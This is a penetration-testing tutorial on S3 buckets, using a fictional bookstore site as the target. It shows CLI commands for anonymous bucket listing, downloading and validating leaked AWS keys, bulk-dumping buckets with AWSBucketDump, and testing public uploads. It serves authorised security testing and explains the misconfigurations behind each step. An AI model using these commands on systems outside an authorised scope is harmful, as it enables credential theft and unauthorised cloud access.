AWS Penetration Testing – S3 Buckets

AWS Simple Storage Service, or S3, is an object storage service offering scalability, security and performance. Using the S3 service, customers can create buckets, which provide simple object storage across multiple geographic regions.

S3 buckets are commonly used for file storage and static website hosting, a feature which Amazon specifically lists within the AWS console. Although it is supported, exposing S3 buckets to the public Internet does come with an increased security risk.

For a penetration tester, enumerating S3 buckets is an extremely valuable skill. S3 buckets have been known to leak AWS access keys, which can grant an initial foothold within a cloud environment.

Enumerating public S3 buckets

In this example, there is a website called “jessies-bookstore.com” which is hosted within an S3 bucket. As this site is publicly accessible and within scope, it is a great place to start our enumeration.

terminal$ host jessies-bookstore.com
jessies-bookstore.com has address 52.92.234.139

terminal$ host 52.92.234.139
139.234.92.52.in-addr.arpa domain name pointer s3-website-eu-north-1.amazonaws.com.

Using the host command, we’ve performed a DNS lookup and resolved the IP address for the “jessies-bookstore.com” domain. Running the same host command against the returned IP address reveals that this domain actually points to an S3 bucket.

It’s worth noting that whenever a bucket is configured for static website hosting, it is assigned its own DNS name, for example “jessies-bookstore.s3-website-eu-north-1.amazonaws.com”.
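
As a quick sanity check, the HTTP response headers returned by such an endpoint will usually confirm that we’re talking to S3. The hostname below is the example one from this walkthrough, and the headers shown are trimmed and illustrative:

terminal$ curl -sI http://jessies-bookstore.s3-website-eu-north-1.amazonaws.com
HTTP/1.1 200 OK
Content-Type: text/html
Server: AmazonS3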

Another excellent way to locate S3 buckets is simply to inspect website source code. Websites often use S3 buckets to store files and images, effectively performing the role of a content delivery network (CDN).
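
A quick, hedged way to hunt for such references from the terminal is to fetch a page and grep for S3 hostnames. The regular expression below is illustrative and won’t match every possible S3 URL format:

terminal$ curl -s https://jessies-bookstore.com | grep -Eo 'https?://[a-zA-Z0-9.-]*s3[a-zA-Z0-9.-]*\.amazonaws\.com[^"]*'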

With the information found during our DNS lookup, we can identify both the bucket name “jessies-bookstore” and the region “eu-north-1”. Bucket names are unique across the whole S3 service, not just an individual account, so it’s becoming more common to find bucket names which include a numeric or random string.
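
Because names are globally unique, candidate bucket names can be probed without any credentials. One hedged option is the standard s3api head-bucket call: a 404 error means the name is unclaimed, a 403 means the bucket exists but we lack access, and a silent exit means we can reach it.

terminal$ aws s3api head-bucket --bucket jessies-bookstore --no-sign-request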

terminal$ aws s3 ls s3://jessies-bookstore --no-sign-request
2022-05-22 19:16:45       3162 index.html
2023-09-10 17:47:16     159790 backup.zip
2023-09-27 01:59:28       3472 access.log
2023-09-27 01:59:30        300 backup-keys-jhgsiyt.txt

Using the AWS CLI, we can see that our attempt to list the bucket was successful. Note that the s3:// URI takes the bucket name rather than the website endpoint, and the --no-sign-request flag tells the CLI to make the request anonymously, without credentials. There appear to be several interesting files which should be inspected further, most notably backup-keys-jhgsiyt.txt and backup.zip. S3-hosted files can be accessed by navigating to them in a web browser; since we’re in the terminal, we can use curl instead. Any file located within an S3 bucket can be fetched by appending the filename to the target domain.

terminal$ curl jessies-bookstore.s3-website-eu-north-1.amazonaws.com/backup-keys-jhgsiyt.txt

# Hi John, here's the backup user access keys. 
aws_access_key_id=UJIJSUEGOV6AFVFTB5NM
aws_secret_access_key=pOLkoKH78GFs3/g2no55DGG4f5IjACwSW3gXcAgK

Excellent, curl allowed us to download the specified file and view its contents. Assuming those keys are still valid, they would grant access to the cloud environment, from which further service enumeration could be conducted.
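
One hedged way to validate found keys is to load them into a throwaway CLI profile and ask STS who they belong to. The profile name “backup-user” and the account details in the output below are purely illustrative:

terminal$ aws configure --profile backup-user
AWS Access Key ID [None]: UJIJSUEGOV6AFVFTB5NM
AWS Secret Access Key [None]: pOLkoKH78GFs3/g2no55DGG4f5IjACwSW3gXcAgK
Default region name [None]: eu-north-1
Default output format [None]: json

terminal$ aws sts get-caller-identity --profile backup-user
{
    "UserId": "AIDAEXAMPLEEXAMPLE1",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/backup"
}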

In addition to downloading a single file, the AWS CLI includes functionality to download the full bucket contents to a specified destination on the local computer.

terminal$ aws s3 sync s3://jessies-bookstore ./s3-download-folder/ --no-sign-request

One of the most famous examples of an insecure S3 bucket is the “million dollar bug” in Instagram.

How S3 manages public bucket access

S3 has four main settings for managing public access to buckets, each of which is enabled by default during bucket setup. Their current state can also be queried via the CLI, as shown after the list below.

  • Block public access to buckets and objects granted through new access control lists (ACLs): S3 will block public access permissions applied to newly added buckets or objects, and prevent the creation of new public access ACLs for existing buckets and objects. This setting doesn’t change any existing permissions that allow public access to S3 resources using ACLs.
  • Block public access to buckets and objects granted through any access control lists (ACLs): S3 will ignore all ACLs that grant public access to buckets and objects.
  • Block public access to buckets and objects granted through new public bucket or access point policies: S3 will block new bucket and access point policies that grant public access to buckets and objects. This setting doesn’t change any existing policies that allow public access to S3 resources.
  • Block public and cross-account access to buckets and objects through any public bucket or access point policies: S3 will ignore public and cross-account access for buckets or access points with policies that grant public access to buckets and objects.
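
These four settings correspond directly to the fields returned by the s3api get-public-access-block call, which is a convenient way to review a bucket’s configuration. The all-false output below is illustrative and would indicate that nothing is being blocked:

terminal$ aws s3api get-public-access-block --bucket jessies-bookstore
{
    "PublicAccessBlockConfiguration": {
        "BlockPublicAcls": false,
        "IgnorePublicAcls": false,
        "BlockPublicPolicy": false,
        "RestrictPublicBuckets": false
    }
}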

S3 also allows for policies to be attached directly to a bucket. As policies can be confusing for people new to AWS, this is another opportunity for misconfiguration. An example of a policy which allows bucket listing can be seen below.

{
    "Version": "2012-10-17",
    "Id": "Policy0000670101234",
    "Statement": [
        {
            "Sid": "Stmt0000670101234",
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::jessies-bookstore"
        }
    ]
}

This policy states that the action “s3:ListBucket” is allowed for any principal (“Principal”: “*”) against the resource “arn:aws:s3:::jessies-bookstore”. This resource is the AWS ARN (Amazon Resource Name) for the S3 bucket “jessies-bookstore”.
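
When testing, it can also be worth attempting to read a target bucket’s policy directly. This requires the s3:GetBucketPolicy permission, so on most targets expect an AccessDenied error rather than the JSON above:

terminal$ aws s3api get-bucket-policy --bucket jessies-bookstore --no-sign-request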

Further bucket enumeration

Now that we have some understanding of bucket configuration, let’s take a look at another example. Some S3 buckets require that a user is authenticated before allowing them to list the contents. Unfortunately, some AWS users are confused by this and assume it means authenticated to their own AWS environment; in reality, the “Authenticated Users” grantee includes any AWS account.

If configured in such a way, S3 will allow any authenticated AWS user to list the bucket contents. This means the restriction can be bypassed simply by logging into your own AWS account and then listing the contents. As Amazon allows anyone to create a free-tier AWS account, this essentially means anyone can list the bucket contents.

terminal$ aws --profile arctil s3 ls s3://jessies-bookstore
2022-05-22 19:16:45       3162 index.html
2023-09-10 17:47:16     159790 backup.zip
2023-09-27 01:59:28       3472 access.log
2023-09-27 01:59:30        300 backup-keys-jhgsiyt.txt

As we can see, even though the “arctil” profile belongs to a completely unrelated AWS account, we have still been able to list the contents of the S3 bucket.

Using AWSBucketDump to enumerate S3 buckets

AWSBucketDump is a tool written in Python that makes S3 bucket enumeration a much more streamlined process. The tool automatically browses S3 buckets, looking for files which match our search criteria.

terminal$ python AWSBucketDump.py -l bucketslist.txt -g keywords.txt -D -m 5000 -d 1

When using AWSBucketDump, a list of bucket names and a list of keywords need to be specified, using the -l and -g flags respectively. The -D flag instructs the tool to download any files found, -m specifies the maximum file size, and -d creates a new local directory for each bucket.

Once run, it’ll check the bucket contents for these keywords and then download any file that matches. Some great examples of valuable keywords are “aws_access_key_id” and “password”.
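
As an illustration, a minimal keywords.txt might look something like the following, with one keyword per line; the exact list is entirely up to you:

terminal$ cat keywords.txt
aws_access_key_id
aws_secret_access_key
password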

AWSBucketDump can find a large number of S3 buckets, so it’s important to ensure you’re using a targeted approach. All buckets that you inspect must be part of the target environment and in scope.

Additionally, AWSBucketDump can consume a large amount of disk space on your local computer. It is recommended that a small maximum file size be specified along with a very specific keywords file.

Uploading To Public Buckets

As we’ve seen in previous examples, S3 can allow the public to list a bucket’s contents. On occasion, it may even be possible to upload files to the bucket. This in itself can be problematic, as consuming storage space could cost a corporation a lot of money. File upload can be tested using the s3 cp command.

terminal$ aws s3 cp local-file.txt s3://jessies-bookstore

If successful, this file will then display when the bucket contents are listed. However, this is not always the case: S3 buckets can occasionally be configured in such a way that the uploaded file will not display, making it appear as though the upload has failed.

To get around this restriction, it may be possible to use the --acl public-read option to set the file as publicly readable. As the file has been marked as readable by the public, assuming the upload worked, it will now display when the bucket is listed.

terminal$ aws s3 cp local-file.txt s3://jessies-bookstore --acl public-read
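
A simple way to confirm the upload worked is to list the bucket again and look for our file. The output below is illustrative:

terminal$ aws s3 ls s3://jessies-bookstore --no-sign-request | grep local-file.txt
2023-09-27 02:14:11         24 local-file.txt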

Conclusion

S3 is a fantastic service which can be utilised in many different ways. Ensuring public access is carefully configured is just the first step in securing a cloud environment. If a bucket needs to be publicly accessible then careful consideration must be given to any files which are uploaded and accessible.



